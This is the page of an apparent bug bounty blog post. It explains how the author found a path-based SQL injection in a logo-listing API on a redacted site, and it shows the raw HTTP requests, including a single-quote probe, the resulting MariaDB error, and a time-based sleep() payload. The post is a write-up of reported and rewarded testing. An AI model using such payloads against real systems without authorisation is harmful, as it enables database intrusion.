<!DOCTYPE html><html lang="en" mode="dark" ><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><style> .purple-background { padding: 20px; margin-bottom: 20px; } .info { text-align: center; margin-bottom: 15px; background-color: rgba(65, 65, 65, 0.3) !important; padding-top: 20px; padding-bottom: 20px; } .info img { width: 50px; /* Ícones pequenos */ height: auto; margin: 0 auto 5px; /* Espaço abaixo da imagem */ } .company-name { font-size: 1.2rem; /* Nome da empresa maior */ color: purple; } .description { font-size: 0.85rem; /* Descrição menor */ color: #DDD; } .nav { display: flex; flex-wrap: wrap; justify-content: space-between; max-width: calc(var(--nav-width) + var(--gap) * 2); margin-inline-start: auto; margin-inline-end: auto; line-height: var(--header-height); } .nav-link { color: white !important; /* Cor branca para todos os itens */ text-decoration: none !important; /* Remover qualquer sublinhado padrão */ font-size: 18px; /* Aumentar o tamanho da fonte */ font-family: 'Source Sans Pro', 'Microsoft Yahei', sans-serif; padding: 12px 15px; /* Aumentar o espaçamento ao redor dos itens */ position: relative; /* Posição relativa para o posicionamento do pseudo-elemento */ } .nav-link::after { content: ''; display: block; width: 100%; height: 3px; /* Grossura do sublinhado */ background-color: purple; /* Cor roxa para o sublinhado */ position: absolute; left: 0; bottom: -3px; /* Espaçamento entre a palavra e o sublinhado */ opacity: 0; /* Inicialmente invisível */ transition: opacity 0.3s; } .nav-link:hover::after, .nav-link:focus::after, .nav-link.active::after { opacity: 1; /* Tornar visível ao passar o mouse, focar ou ser ativo */ } .container-fluid { max-widht: calc(var(--nav-widht) + var(--gap) * 2); padding-right: 50px; /* Aumentar o padding à direita para afastar os itens do canto */ }</style><title>The exploitation of a $$$$ SQL Injection Path Based | Ferreiraklet</title><meta name="generator" content="Jekyll v4.3.4" /><meta property="og:title" content="The exploitation of a \(\) SQL Injection Path Based" /><meta name="author" content="Ferreiraklet" /><meta property="og:locale" content="en" /><meta name="description" content="Here is how I exploited a unusual SQL Injection Path Based and got rewarded with bounty" /><meta property="og:description" content="Here is how I exploited a unusual SQL Injection Path Based and got rewarded with bounty" /><link rel="canonical" href="http://localhost:4000/posts/SQLInjection/" /><meta property="og:url" content="http://localhost:4000/posts/SQLInjection/" /><meta property="og:site_name" content="Ferreiraklet" /><meta property="og:image" content="http://localhost:4000/assets/img/Posts/sqli.png" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2024-06-03T11:13:13+00:00" /><meta name="twitter:card" content="summary_large_image" /><meta property="twitter:image" content="http://localhost:4000/assets/img/Posts/sqli.png" /><meta property="twitter:title" content="The exploitation of a \(\) SQL Injection Path Based" /><meta name="twitter:site" content="@Ferreiraklet" /><meta name="twitter:creator" content="@Ferreiraklet" /><meta name="google-site-verification" content="google_meta_tag_verification" /> <script type="application/ld+json"> {"@type":"BlogPosting","description":"Here is how I exploited a unusual SQL Injection Path Based and got rewarded with bounty","dateModified":"2024-06-03T11:13:13+00:00","headline":"The exploitation of a \\(\\) SQL Injection Path Based","datePublished":"2024-06-03T11:13:13+00:00","url":"http://localhost:4000/posts/SQLInjection/","image":"http://localhost:4000/assets/img/Posts/sqli.png","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/posts/SQLInjection/"},"author":{"@type":"Person","name":"Ferreiraklet"},"@context":"https://schema.org"}</script><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon.png"><link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon-precomposed.png"><link rel="apple-touch-icon" sizes="57x57" href="/assets/img/favicons/apple-icon-57x57.png"><link rel="apple-touch-icon" sizes="60x60" href="/assets/img/favicons/apple-icon-60x60.png"><link rel="apple-touch-icon" sizes="72x72" href="/assets/img/favicons/apple-icon-72x72.png"><link rel="apple-touch-icon" sizes="76x76" href="/assets/img/favicons/apple-icon-76x76.png"><link rel="apple-touch-icon" sizes="114x114" href="/assets/img/favicons/apple-icon-114x114.png"><link rel="apple-touch-icon" sizes="120x120" href="/assets/img/favicons/apple-icon-120x120.png"><link rel="apple-touch-icon" sizes="144x144" href="/assets/img/favicons/apple-icon-144x144.png"><link rel="apple-touch-icon" sizes="152x152" href="/assets/img/favicons/apple-icon-152x152.png"><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-icon-180x180.png"><link rel="icon" type="image/png" sizes="192x192" href="/assets/img/favicons/android-icon-192x192.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="96x96" href="/assets/img/favicons/favicon-96x96.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/manifest.json"><meta name='msapplication-config' content='/assets/img/favicons/browserconfig.xml'><meta name="msapplication-TileColor" content="#ffffff"><meta name="msapplication-TileImage" content="/assets/img/favicons/ms-icon-144x144.png"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://fonts.gstatic.com"><link rel="preconnect" href="cdn.jsdelivr.net"><link rel="dns-prefetch" href="cdn.jsdelivr.net"><link rel="preload" as="style" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css" integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css" integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin="anonymous"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css" integrity="sha256-+N4/V/SbAFiW1MPBCXnfnP9QSN3+Keu+NlB+0ev/YKQ=" crossorigin="anonymous"><link rel="preload" as="style" href="/assets/css/post.css"><link rel="stylesheet" href="/assets/css/post.css"><link rel="preload" as="style" href="/assets/css/lib/bootstrap-toc.min.css"><link rel="stylesheet" href="/assets/css/lib/bootstrap-toc.min.css" /><link rel="preload" as="script" href="https://cdn.jsdelivr.net/npm/jquery@3.4.1" integrity="sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFlBw8HfCJo=" crossorigin="anonymous"> <script src="https://cdn.jsdelivr.net/npm/jquery@3.4.1" integrity="sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFlBw8HfCJo=" crossorigin="anonymous"></script> <script src="https://cdn.jsdelivr.net/combine/npm/popper.js@1.15.0,npm/bootstrap@4.0.0/dist/js/bootstrap.min.js" async></script> <script src="/assets/js/post.min.js" async></script><body data-spy="scroll" data-target="#toc"><nav class="navbar navbar-expand-lg navbar-dark"><div class="container-fluid"><div id="profile-wrapperx" class="d-flex align-items-center"> <a href="/" alt="avatar"> <img src="/assets/img/sample/avatar.jpg" alt="avatar" style="height: 40px; width: 40px; border-radius: 50%;" onerror="this.style.display='none'"> </a><p></p><div class="site-subtitle" style="padding: 10px; font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;;font-size: 24px; font-weight: 700;">Ferreiraklet</div></div><button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarNavDropdown" aria-controls="navbarNavDropdown" aria-expanded="false" aria-label="Toggle navigation"> <span class="navbar-toggler-icon"></span> </button><div class="collapse navbar-collapse justify-content-end" id="navbarNavDropdown"><ul class="navbar-nav"><li class="nav-item"> <a class="nav-link " href="/">Home</a><li class="nav-item"> <a class="nav-link " href="/tabs/hacking/">Hacking</a><li class="nav-item"> <a class="nav-link " href="/tabs/bugbounty/">Bug Bounty</a><li class="nav-item"> <a class="nav-link " href="/tabs/acknowledgments/">Acknowledgments</a></ul></div></div></nav><div id="main-wrapper"><div id="main"><div class="row"><div id="post-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><h1 data-toc-skip>The exploitation of a $$$$ SQL Injection Path Based</h1><div class="post-meta text-muted d-flex flex-column"><div> Posted <span class="timeago " data-toggle="tooltip" data-placement="bottom" title="Mon, Jun 3, 2024, 11:13 AM +0000" > Jun 3 <i class="unloaded">2024-06-03T11:13:13+00:00</i> </span> by <span class="author"> Ferreiraklet </span></div></div><div class="post-content"> <img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="/assets/img/Posts/sqli.png" class="post-preview-img"><h1 id="here-is-how-i-exploited-a-unusual-sql-injection-path-based-and-got-rewarded-with-bounty">Here is how I exploited a unusual SQL Injection Path Based and got rewarded with bounty</h1><p>First of all, here are some sections that will be covered in this article,</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre><td class="rouge-code"><pre>┌───────────────Summary────────────────┐
│                                      │
│  1. Fase One - Analysing features    │
│     - Finding interesting feature    │
│  2. Fase Two - Exploitation          │
│                                      │
└──────────────────────────────────────┘
</pre></table></code></div></div><h1 id="section-1---analysing-features">Section 1 - Analysing features</h1><p>In this web application, after logging in, This site had 3 main functionalities, one for creating <code class="language-plaintext highlighter-rouge">ebrochures</code>, another for creating <code class="language-plaintext highlighter-rouge">embed content</code>, and another for creating <code class="language-plaintext highlighter-rouge">mini sites</code>.</p><p>All of this 3 functionalities had a logo system, which query all existent logos uploaded to the website, along with a <code class="language-plaintext highlighter-rouge">logo upload</code> which will be covered in the next article 💀.</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="/assets/img/Posts/functionalities.png" /></p><h2 id="finding-interesting-feature">Finding Interesting Feature</h2><p>After identifying that there was a <code class="language-plaintext highlighter-rouge">logo upload system</code>, and that it searched for existing logos using a <code class="language-plaintext highlighter-rouge">query</code>, I decided to take a deeper look at this part.</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="/assets/img/Posts/logofunc.png" /></p><p>To show the logos that have been approved, it makes a <code class="language-plaintext highlighter-rouge">suspicious query</code>, and then <code class="language-plaintext highlighter-rouge">loads the page</code> and makes it possible to upload another logo.</p><p>In this article I will only focus on the exploration part of how the application gets these <code class="language-plaintext highlighter-rouge">approved logos</code>.</p><h1 id="section-2---exploitation">Section 2 - Exploitation</h1><p>Now, by intercepting the request to logo endpoint, we have the following:</p><p><strong>Request</strong>:</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
</pre><td class="rouge-code"><pre>GET /api/csb/agency-logos/session/446423692089-1763610-6897710-9302502/include/Approved,Rejected,Pending/allAgencies/false/sortBy/DATE_DESC HTTP/2
Host: redacted.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/plain, */*
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers


</pre></table></code></div></div><p>Analyzing the request, it was possible to notice that after the include/ endpoint,</p><p>it uses as arguments some values that serve to <code class="language-plaintext highlighter-rouge">identify</code> the logos, that is, those values that are there are used to <code class="language-plaintext highlighter-rouge">filter</code> the logos by <code class="language-plaintext highlighter-rouge">approved</code> logos, <code class="language-plaintext highlighter-rouge">pending approval</code>, or <code class="language-plaintext highlighter-rouge">rejected</code>.</p><p>Which seems strange, because a <code class="language-plaintext highlighter-rouge">comma</code> is even being used to separate the arguments, and at the end of the path there is a <code class="language-plaintext highlighter-rouge">sortBy</code>, which leads me to believe that this endpoint is probably <code class="language-plaintext highlighter-rouge">querying the database</code> to get the logos</p><p><strong>Request with single quote</strong>:</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
</pre><td class="rouge-code"><pre>GET /api/csb/agency-logos/session/446423692089-1763610-6897710-9302502/include/Approved'/allAgencies/false/sortBy/DATE_DESC HTTP/2
Host: redacted.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/plain, */*
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers


</pre></table></code></div></div><p>What we got:</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''Approved'')  ORDER BY CAST(STATUS AS CHAR) ASC, APPROVED_DATE DESC' at line 20, errors: [{errorType: (SYSTEM_ERROR, System Error), errorCode: (030003, System Error), message: Dao Error}]}",
</pre></table></code></div></div><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="/assets/img/Posts/singlequote.png" /></p><p>Perfect!, we now know for sure it is vulnerable to SQL Injection.</p><hr /><p>Since we know that the query has ‘), we need to escape it but fix the syntax by also putting the ), so as not to break the query</p><p><strong>Time Based Payload Request</strong>:</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
</pre><td class="rouge-code"><pre>GET /api/csb/agency-logos/session/446423692089-1763610-6897710-9302502/include/Approved')+and+sleep(2)+--+-/allAgencies/false/sortBy/DATE_DESC HTTP/2
Host: www.redacted.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/plain, */*
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers


</pre></table></code></div></div><p>Due to the use of <code class="language-plaintext highlighter-rouge">akamai cdn</code>, and communication with <code class="language-plaintext highlighter-rouge">internal servers</code>, sleep payload was taking <code class="language-plaintext highlighter-rouge">6 seconds longer</code>, that is, <code class="language-plaintext highlighter-rouge">sleep(1)</code> takes 6 seconds, <code class="language-plaintext highlighter-rouge">sleep(2)</code> 12 seconds, and <code class="language-plaintext highlighter-rouge">sleep(3)</code>, 18 seconds, but this did not affect the triage of the report.</p><p><strong>sleep(1)</strong>:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="/assets/img/Posts/1sec.png" /></p><p><strong>sleep(2)</strong>:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="/assets/img/Posts/2sec.png" /></p><p>This was enough to get the report triaged. GG!</p><hr /><h1 id="thank-you-">Thank you !</h1><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="/assets/img/Posts/end.png" /></p><h1 id="report-status">Report Status</h1><blockquote><p>Reported at - July 9, 2024, 10:26pm UTC</p></blockquote><blockquote><p>Triaged at - July 10, 2024, 8:35pm UTC</p></blockquote><blockquote><p>Payed at - July 11, 2024, 7:03pm UTC</p></blockquote><blockquote><p>OBS: This report was made along with my friend which found this application and program for testing and send it to me, thanks @foorw1nner :)</p></blockquote><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="/assets/img/Posts/bountysqli.png" /></p></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='/categories/bugbounty/'>bugbounty</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i> <a href="/tags/bugbounty/" class="post-tag no-text-decoration" >bugbounty</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center mt-3 pt-5 pb-2"><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/">CC BY 4.0</a> by the author.</div><div class="share-wrapper"> <span class="share-label text-muted mr-1">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=The exploitation of a $$$$ SQL Injection Path Based - Ferreiraklet&url=http://localhost:4000/posts/SQLInjection/" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=The exploitation of a $$$$ SQL Injection Path Based - Ferreiraklet&u=http://localhost:4000/posts/SQLInjection/" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://telegram.me/share?text=The exploitation of a $$$$ SQL Injection Path Based - Ferreiraklet&url=http://localhost:4000/posts/SQLInjection/" data-toggle="tooltip" data-placement="top" title="Telegram" target="_blank"> <i class="fa-fw fab fa-telegram"></i> </a> <i class="fa-fw fas fa-link small" onclick="copyLink()" data-toggle="tooltip" data-placement="top" title="Copy link"></i> </span></div></div></div></div></div><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted topbar-down"><div class="access"><div id="toc-wrapper" class="pl-0 pr-4 mb-5"><h3 data-toc-skip class="pl-3 pt-2 mb-2">Contents</h3><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div class="col-12 col-lg-11 col-xl-8"><div id="post-extend-wrapper" class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><div id="related-posts" class="mt-5 mb-2 mb-sm-4"><h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Further Reading</h3><div class="card-deck mb-4"><div class="card"> <a href="/posts/ReconWideScope/"><div class="card-body"> <span class="timeago small" > Apr 20 <i class="unloaded">2024-04-20T11:13:13+00:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>ASN Recon | Recon wide scope targets</h3><div class="text-muted small"><p> Coming Soon :)</p></div></div></a></div><div class="card"> <a href="/posts/4000BountyAws/"><div class="card-body"> <span class="timeago small" > Jun 3 <i class="unloaded">2024-06-03T11:13:13+00:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>How I g0t 4000$ for AWS Metadata Leak and Takeover $$</h3><div class="text-muted small"><p> Here is how I g0t $$ pwning AWS cloud of a bug bounty program at HackerOne First of all, we have some sections that will be covered in this article, ┌───────────────Summary────────────────┐ │ ...</p></div></div></a></div></div></div><div class="post-navigation d-flex justify-content-between"> <a href="/posts/4000BountyAws/" class="btn btn-outline-primary"><p>How I g0t 4000$ for AWS Metadata Leak and Takeover $$</p></a> <span class="btn btn-outline-primary disabled"><p>-</p></span></div></div></div></div><script type="text/javascript" src="https://cdn.jsdelivr.net/npm/lozad/dist/lozad.min.js"></script> <script type="text/javascript"> const imgs = document.querySelectorAll('#post-wrapper img'); const observer = lozad(imgs); observer.observe(); </script><footer class="d-flex w-100 justify-content-center"><div class="d-flex justify-content-between align-items-center"><div class="footer-left"><p class="mb-0"> © 2024 <a href="https://twitter.com/ferreiraklet">ferreiraklet</a>. <span data-toggle="tooltip" data-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span> <script src="https://www.hackthebox.com/badge/945147"></script></p></div><div class="footer-right"><p class="mb-0"> Powered by <a href="https://jekyllrb.com" target="_blank">Jekyll</a> with <a href="https://github.com/cotes2020/jekyll-theme-chirpy/">Chirpy</a> theme.</p></div></div></footer></div><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-xl-11 post-content"><div id="search-hints"><h4 class="text-muted mb-4">Trending Tags</h4><a class="post-tag" href="/tags/bugbounty/">bugbounty</a></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a> <script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.7.3/dest/simple-jekyll-search.min.js"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/js/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="http://localhost:4000{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"><div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>{categories}</div><div><i class="fa fa-tag fa-fw"></i>{tags}</div></div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No result founds.</p>' }); </script>
